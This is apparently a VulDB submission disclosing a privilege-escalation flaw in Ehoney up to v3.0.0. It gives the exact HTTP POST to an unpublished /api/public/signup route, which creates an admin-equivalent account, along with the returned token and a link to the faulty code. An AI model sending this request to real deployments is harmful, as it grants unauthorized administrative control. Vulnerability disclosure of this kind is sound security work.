| タイトル | Ehoney <= v3.0.0 unpublished signup api via /api/public/signup |
|---|
| 説明 | ## description
In Ehoney<=v3.0.0, there is an unpublished registered route. Any user can register an account through this api and log in. Since there is no permission division, this user has the same management permission as admin.
## request
POST /api/public/signup HTTP/1.1
Content-Length: 40
Content-Type: application/json
Host: x.x.x.x:8080
{
"username": "a",
"password": "a"
}
## response
{
"code": 200,
"msg": "ok",
"data": {
"name": "a",
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo"
}
}
## affected code
https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/controllers/user_handler/uesr.go#L51
|
|---|
| ユーザー | Anonymous User |
|---|
| 送信 | 2022年10月28日 03:54 (3 年 ago) |
|---|
| モデレーション | 2022年10月28日 07:42 (4 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 212417 [seccome Ehoney /api/public/signup 特権昇格] |
|---|
| ポイント | 17 |
|---|